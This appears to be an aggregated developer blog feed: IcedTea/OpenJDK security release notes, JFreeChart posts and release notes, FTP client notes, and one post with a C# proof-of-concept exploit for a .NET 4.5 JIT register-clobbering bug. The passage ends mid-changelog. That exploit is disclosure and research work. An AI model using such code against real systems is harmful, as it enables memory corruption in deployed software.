
News

Posted over 12 years ago
The IcedTea 2.3.x branch now uses the same version of HotSpot (hs23 from the IcedTea 2.3.x forest) for all builds:

http://icedtea.classpath.org/hg/release/icedtea7-2.3/rev/4c7988ed06f8

This is following the import of the ARM32 port to the 2.3 forest. Please test and report any issues as soon as possible. We plan to do a 2.3.11 release based on this by the end of the month. There are no planned security updates for the 2.1.x and 2.2.x branches, so they will become obsolete with the October 2013 security update.
Posted over 12 years ago
I decided it is well past the right time for me to learn more about graphics technologies on the web so, after wrapping up the JFreeChart 1.0.15 release on Monday, I started exploring. Those of you that haven't been living under a rock for the last few years (as I have been) will already know that the HTML5 Canvas element has an API that's, more or less, functionally equivalent to the Java2D API. I had to convince myself of this, of course, so I wrote a general purpose Java class (CanvasGraphics2D) that maps Graphics2D API calls in Java and emits corresponding Javascript code, and hooked it up to JFreeChart. The result is pretty nice, even if not that useful (the generated Javascript paints a picture with a fixed dimension so, coming from Java, we might as well have just provided a PNG image directly...with a bit of Javascript wizardry there is probably a solution to that, but not now).

Here's the output for a sample chart (click here for the live Javascript version) which also tells us some interesting things about how browser usage is changing:

After running CanvasGraphics2D on many of the JFreeChart demo charts and seeing the output, I'm not as reluctant as I once was to learn more Javascript! Thankfully the tools for writing and debugging Javascript have improved also so in the near future...well we'll see.

Alongside Canvas, browser support for the Scalable Vector Graphics (SVG) format appears to have evolved considerably during my time under the rock. So following my success in creating a working CanvasGraphics2D in a short space of time, and being in 'R&D' mode at the moment, I decided to have a go at a light-weight SVGGraphics2D implementation (Batik has existed for a long time, but I don't think it can be described as light-weight).

This also didn't take all that long, and after connecting it up to JFreeChart here's the result (click here for the "live" SVG version):

This format is a bit more useful coming from Java than the output from CanvasGraphics2D because SVG has built-in support for scaling, so the quality of the image is retained as it is scaled in the browser (or anywhere else), which is nicer than what you get from PNG or other image formats:

Furthermore, the SVG format can be used in a lot of other places besides the browser, so this light-weight SVGGraphics2D class has some utility. It is working well with JFreeChart, but I have a little more work to do on it (there is no image support so far, and the clipping and transforming code also needs some work). Once it is complete, I plan to attach a proprietary (gasp) licence to it and include it as a small bonus to developers that purchase the JFreeChart Developer Guide...and give an additional incentive for people to (financially) support my open source work.
Posted over 12 years ago
I added some long-due functions to FTP, handled by a request dialog:

- Local and Remote Rename
- Local and Remote New Folder

Furthermore, currently it is boring that after each operation the file lists are not updated. I thus changed the core representation, fileTable, to be a mutable array and added basic manipulation methods. I will then progressively add provision to update dynamically the list after operations. Right now I worked on delete. The first impact is that the contents of the selection need always be copied before launching an operation, otherwise operations with selections larger than one element may fail or behave wrongly after the first element got processed.

Also, I noticed that FTP lacks a refresh function. Sometimes after years you notice the most basic things! I'll need to implement that.
Posted over 12 years ago
Since two weeks ago my office has been this hillside hut. It’s a bit of a change from the pokey junkroom I’ve worked from this past twelve years. It’s a bit spartan inside right now–just a desk, a chair and a computer–but I’ll post some pictures later when I’ve jazzed it up a bit.
Posted over 12 years ago
The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. These releases update our OpenJDK 6 support to include the latest security updates. We recommend that users upgrade as soon as possible.

The security fixes are as follows:

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8001330, CVE-2013-2443: Improve on checking order
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below. Note that we have also included a subset of the changes which were part of the 7u25 update, comprising those which we thought safest to include in a stable 6 release.

What’s New?

New in release 1.11.12 (2013-07-10)

Security fixes

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8001330, CVE-2013-2443: Improve on checking order
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

Backports

- S6469266: Integrate Apache XMLSec 1.4.2 into JDK 7
- S6541350: TimeZone display names localization
- S6656651: Windows Look and Feel LCD glyph images have some differences from native applications.
- S6786028: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Bold tags should be strong
- S6786682: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – HTML tag should have lang attribute
- S6786688: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Table must have captions and headers
- S6786690: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – DL tag and nesting issue
- S6802694: Javadoc doclet does not display deprecated information with -nocomment option for serialized form
- S6821191: Timezone display name localization
- S6851834: Javadoc doclet needs a structured approach to generate the output HTML.
- S6888167: memory leaks in the medialib glue code
- S6961178: Allow doclet.xml to contain XML attributes
- S6977550: (tz) Support tzdata2010l
- S6996686: (tz) Support tzdata2010o
- S7006270: Several javadoc regression tests are failing on windows
- S7017800: (tz) Support tzdata2011b
- S7027387: (tz) Support tzdata2011d
- S7033174: (tz) Support tzdata2011e
- S7039469: (tz) Support tzdata2011g
- S7090843: (tz) Support tzdata2011j
- S7103108: (tz) Support tzdata2011l
- S7103405: Correct display names for Pacific/Apia timezone
- S7104126: Insert openjdk copyright header back into TZdata files
- S7158483: (tz) Support tzdata2012c
- S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing
- S7198570: (tz) Support tzdata2012f
- S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node
- S8002225: (tz) Support tzdata2012i
- S8009165: Fix for 8006435 needs revision
- S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03
- S8009530: ICU Kern table support broken
- S8009610: Blacklist certificate used with malware.
- S8009987: (tz) Support tzdata2013b
- S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail
- S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod
- S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance
- S8010939: Deadlock in LogManager
- S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows
- S8011557: Improve reflection utility classes
- S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05
- S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris
- S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer
- S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07
- S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext()
- S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09
- S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10

New in release 1.12.6 (2013-07-10)

Security fixes

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8001330, CVE-2013-2443: Improve on checking order
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

Backports

- S6469266: Integrate Apache XMLSec 1.4.2 into JDK 7
- S6541350: TimeZone display names localization
- S6656651: Windows Look and Feel LCD glyph images have some differences from native applications.
- S6786028: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Bold tags should be strong
- S6786682: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – HTML tag should have lang attribute
- S6786688: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Table must have captions and headers
- S6786690: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – DL tag and nesting issue
- S6802694: Javadoc doclet does not display deprecated information with -nocomment option for serialized form
- S6821191: Timezone display name localization
- S6851834: Javadoc doclet needs a structured approach to generate the output HTML.
- S6888167: memory leaks in the medialib glue code
- S6961178: Allow doclet.xml to contain XML attributes
- S6977550: (tz) Support tzdata2010l
- S6996686: (tz) Support tzdata2010o
- S7006270: Several javadoc regression tests are failing on windows
- S7017800: (tz) Support tzdata2011b
- S7027387: (tz) Support tzdata2011d
- S7033174: (tz) Support tzdata2011e
- S7039469: (tz) Support tzdata2011g
- S7090843: (tz) Support tzdata2011j
- S7103108: (tz) Support tzdata2011l
- S7103405: Correct display names for Pacific/Apia timezone
- S7104126: Insert openjdk copyright header back into TZdata files
- S7158483: (tz) Support tzdata2012c
- S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing
- S7198570: (tz) Support tzdata2012f
- S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node
- S8002225: (tz) Support tzdata2012i
- S8009165: Fix for 8006435 needs revision
- S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03
- S8009530: ICU Kern table support broken
- S8009610: Blacklist certificate used with malware.
- S8009987: (tz) Support tzdata2013b
- S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail
- S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod
- S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance
- S8010939: Deadlock in LogManager
- S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows
- S8011557: Improve reflection utility classes
- S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05
- S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris
- S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer
- S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07
- S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext()
- S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09
- S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10

The tarballs can be downloaded from:

- http://icedtea.classpath.org/download/source/icedtea6-1.11.12.tar.gz
- http://icedtea.classpath.org/download/source/icedtea6-1.12.6.tar.gz

SHA256 checksums:

    7b2dbad30b233a631dea6631385570ebfa851390e359fd2ef193da0f76a9d884  icedtea6-1.11.12.tar.gz
    18d98fd05ef8d5088b09c444e0b025a8295181c6ae2efb6ebefe0a0397062865  icedtea6-1.12.6.tar.gz

The tarballs are accompanied by a digital signature available at:

- http://icedtea.classpath.org/download/source/icedtea6-1.11.12.tar.gz.sig
- http://icedtea.classpath.org/download/source/icedtea6-1.12.6.tar.gz.sig

respectively. This is produced using my public key. See details below.

PGP Key: 248BDC07 (https://keys.indymedia.org/)
Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07

The following people helped with these releases:

- Severin Gehwolf (S7170730, S8001032, S8008585, S8009067)
- Andrew Hughes (all other bug fixes, application of security fixes & backports, release management)
- Omair Majid (non-security 7u25 backports)
- Chris Phillips (HotSpot security backports)

We would also like to thank the bug reporters and testers!

To get started:

    $ tar xzf icedtea-${ver}.tar.gz
    $ mkdir icedtea-build
    $ cd icedtea-build
    $ ../icedtea-${ver}/configure
    $ make

where ${ver} is the version used. Full build requirements and instructions are available in the INSTALL file.

Happy hacking!
Posted over 12 years ago
I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

    using System;
    using System.Runtime.CompilerServices;

    struct Foo {
      byte b1, b2, b3;
    }

    class U1 { }
    class U2 { }

    struct StackFields {
      internal object f1;
      internal U1 f2;
      internal U2 f3;
    }

    class Program {
      long field1;
      long field2;

      static void Main() {
        new Program().Get(new Foo[1, 1]);
      }

      [MethodImpl(MethodImplOptions.NoInlining)]
      object Get<T>(T[,] arr) {
        StackFields fields = new StackFields();
        fields.f1 = new U1();
        fields.f2 = new U1();
        fields.f3 = new U2();
        arr.ToString();
        object v = arr[0, 0];
        field2 = field1;
        Console.WriteLine(fields.f3);
        return v;
      }
    }

This requires .NET 4.5 x64 (and must be built/run in release mode). The bug is that the array accessor that is generated clobbers the RSI and RDI registers.
Posted over 12 years ago
A new release of JFreeChart is now available for download. This release contains support for non-visible series in XYBarRenderer, minor gridlines in PolarPlot, new legend item ordering options, chart editor enhancements, updates to StandardDialScale, localisation files for Japanese, refactored parameter checks and a fix for a minor security flaw in the DisplayChart class, detected and reported by OSI Security: http://www.osisecurity.com.au/advisories/jfreechart-path-disclosure.

Patches:

- 3500621 : LegendTitle order attribute (by Simon Kaczor);
- 3463807 : ChartComposite does not dispose popup (by Sebastiao Correia);
- 3204823 : PaintAlpha for 3D effects (by Dave Law);

Bug Fixes:

- 3561093 : Rendering anomaly for XYPlots;
- 3555275 : ValueAxis.reserveSpace() problem for axes with fixed dimension;
- 3521736 : DeviationRenderer optimisation (by Milan Ramaiya);
- 3514487 : SWTGraphics2D get/setStroke() problem;
- 3508799 : DefaultPolarItemRenderer does not populate seriesKey in LegendItem;
- 3482106 : Missing text in SWTGraphics2D (by Kevin Xu);
- 3484408 : Maven fixes (Martin Hoeller);
- 3484403 : DateAxis endless loop (by Martin Hoeller);
- 3446965 : TimeSeries calculates range incorrectly in addOrUpdate();
- 3445507 : TimeSeriesCollection.findRangeBounds() regression;
- 3425881 : XYDifferenceRenderer fix (by Patrick Schlott/Christoph Schroeder);
- 2963199 : SWT print job (by Jonas Rüttimann);
- 2879650 : Path disclosure vulnerability in DisplayChart servlet;

Also fixed a rendering issue for polar charts using an inverted axis.

Please help to spread the word about JFreeChart (blogs, tweets and word-of-mouth are all appreciated), and if you are using JFreeChart at your company please consider supporting our project by purchasing the JFreeChart Developer Guide and demo source code. Financial support is critically important for the project.

Special thanks to the whole team at SourceForge for providing more than a decade of free infrastructure and hosting to the JFreeChart project!
Posted over 12 years ago
The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. This release updates our OpenJDK 7 support to include the latest security updates. As mentioned in the notes for the 2.4.0 release, we also continue to track the upcoming u40 release upstream and this update synchronises IcedTea with 7u40 b31.

The security fixes are as follows:

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001308: Update display of applet windows
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8001330, CVE-2013-2443: Improve on checking order (non-Zero builds only)
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004288, CVE-2013-2449: (fs) Files.probeContentType problems
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8007925: Improve cmsStageAllocLabV2ToV4curves
- S8007926: Improve cmsPipelineDup
- S8007927: Improve cmsAllocProfileSequenceDescription
- S8007929: Improve CurvesAlloc
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008607: Better input checking in JMX
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009008: Better manage management-api
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009057, CVE-2013-2448: Improve MIDI event handling
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change
- S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields
- S8009654: Improve stability of cmsnamed
- S8010209, CVE-2013-2460: Better provision of factories
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures.

In this release, use of the system version of LCMS is disabled by default to ensure the most secure version is used. Before using the system version, please ensure it is version 2.5 or above, or it has the S8007925, S8007926, S8007927, S8007929 and S8009654 updates listed above.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below. Note that the unusually large number of OpenJDK changes is due to the upstream synchronisation mentioned above.

What’s New?

New in release 2.4.1 (2013-07-05)

Security fixes

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001308: Update display of applet windows
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8001330, CVE-2013-2443: Improve on checking order (non-Zero builds only)
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004288, CVE-2013-2449: (fs) Files.probeContentType problems
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8007925: Improve cmsStageAllocLabV2ToV4curves
- S8007926: Improve cmsPipelineDup
- S8007927: Improve cmsAllocProfileSequenceDescription
- S8007929: Improve CurvesAlloc
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008607: Better input checking in JMX
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009008: Better manage management-api
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009057, CVE-2013-2448: Improve MIDI event handling
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change
- S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields
- S8009654: Improve stability of cmsnamed
- S8010209, CVE-2013-2460: Better provision of factories
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

OpenJDK

- S2223192: [macosx] “opposite” seems always null in focus events
- S4504275: CORBA boolean type unions do not generate compilable code from idlj
- S6337518: Null Arrow Button Throws Exception in BasicComboBoxUI
- S6429204: (se) Concurrent Selector.register and SelectionKey.interestOps can ignore interestOps
- S6436314: Vector could be created with appropriate size in DefaultComboBoxModel
- S6443505: Ideal() function for CmpLTMask
- S6470730: Disconnect button leads to wrong popup message
- S6725714: par compact – add a table to speed up bitmap searches
- S6761744: Hotspot crashes if process size limit is exceeded
- S6843375: Debuggee VM crashes performing mark-sweep-compact
- S7038105: File.isHidden() should return true for pagefile.sys and hiberfil.sys
- S7053526: Upgrade JDK 8 to use Little CMS 2.4
- S7056447: test/java/lang/management/ManagementFactory/MBeanServerMXBeanUnsupportedTest.java fails in agentvm
- S7066063: CMS: “Conservation Principle” assert failed
- S7068740: If you wrap a JTable in a JLayer you can’t use the page up and page down cmds
- S7105030: [TEST_BUG] [macosx] The tests never finishes
- S7109087: gc/7072527/TestFullGCCount.java fails when GC is set in command-line
- S7109977: [macosx] MixingInHwPanel.java test fails on Mac trying to click in the reserved corner
- S7115383: TEST_BUG: some jtreg tests fail because they explicitly specify -server option
- S7124520: [macosx] re:6373505 Toolkit.getScreenResolution() != GraphicsConfiguration.getNormalizingTransform()
- S7132378: Race in FutureTask if used with explicit set ( not Runnable )
- S7142919: TEST_BUG: java/nio/channels/AsyncCloseAndInterrupt.java failing intermittently [sol11]
- S7151823: The test incorrectly recognizing OS
- S7152798: TEST_BUG: sun/management/HotspotClassLoadingMBean/GetClassLoadingTime.java does not compile
- S7152866: Tests not run because they are missing the @run tag
- S7157656: (zipfs) SeekableByteChannel to entry in zip file always reports its position as 0
- S7158350: [macosx]
Strange results of SwingUIText printing S7160084: javac fails to compile an apparently valid class/interface combination S7163898: add isLoggable() check to doLog() S7164256: EnumMap clone doesn’t clear the entrySet keeping a reference to the original Map S7174966: With OCSP enabled on Java 7 get error ‘Wrong key usage’ with Comodo certificate S7176220: ‘Full GC’ events miss date stamp information occasionally S7176479: G1: JVM crashes on T5-8 system with 1.5 TB heap S7179050: [macosx] Make LWAWT be able to run on AppKit thread S7179353: try-with-resources fails to compile with generic exception parameters S7181710: [macosx] jawt_md.h shipped with jdk is outdated S7183520: [macosx]Unable to print out the defined page for 2D_PrintingTiger/JTablePrintPageRangesTest S7183800: TEST_BUG: Update tests to run on Ubuntu 12.04 (localhost is 127.0.1.1) S7184908: TEST_BUG: [macosx] closed/com/sun/java/swing/plaf/gtk/4928019/bug4928019.java fails S7184945: [macosx] NPE in AquaComboBoxUI since jdk7u6b17, jdk8b47 S7186737: Unable to allocate bit maps or card tables for parallel gc for the requested heap S7190897: (fs) Files.isWritable method returns false when the path is writable (win) S7194902: [macosx] closed/java/awt/Button/DoubleActionEventTest/DoubleActionEventTest failed since jdk8b49 S7196080: assert(max_heap >= 